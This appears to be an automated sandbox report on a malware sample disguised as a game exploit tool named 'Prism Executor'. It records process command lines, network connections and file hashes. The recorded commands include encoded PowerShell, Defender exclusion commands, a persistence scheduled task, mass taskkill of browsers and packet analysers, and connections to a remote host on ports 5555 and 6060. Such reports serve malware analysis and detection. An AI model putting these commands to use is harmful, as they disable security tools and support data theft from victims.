"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\Prism Executor.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3116_133629147297712041\nexusloader.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4156 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\cffckp.exe

"C:\Users\Admin\AppData\Local\Temp\cffckp.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\cffckp.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\ProgramData\Windows Runtime.exe

"C:\ProgramData\Windows Runtime.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\onefile_1220_133629148139558484\svchost.exe" "--multiprocessing-fork" "parent_pid=800" "pipe_handle=824"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath \"C:\\\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
NL 91.92.241.69:5555 tcp
US 8.8.8.8:53 69.241.92.91.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tcp
NL 91.92.241.69:6060 91.92.241.69 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 freeimage.host udp
US 104.21.22.122:443 freeimage.host tcp

Files

C:\Users\Admin\dllhost.exe

MD5 4a7f75343aaa5a4d8d18add50ccf3139
SHA1 110c62eee6d7deb4aa9d601c942eae43482d2125
SHA256 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
SHA512 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

memory/4492-31-0x00007FFAE3683000-0x00007FFAE3685000-memory.dmp

memory/4492-33-0x00000000004C0000-0x00000000004DA000-memory.dmp

C:\Users\Admin\Prism Executor.exe

MD5 fa819e23d8fee4ea89aaaea55e0b28f5
SHA1 18335d4e0d140dcab66c7197c57f669251898ce5
SHA256 bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
SHA512 e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

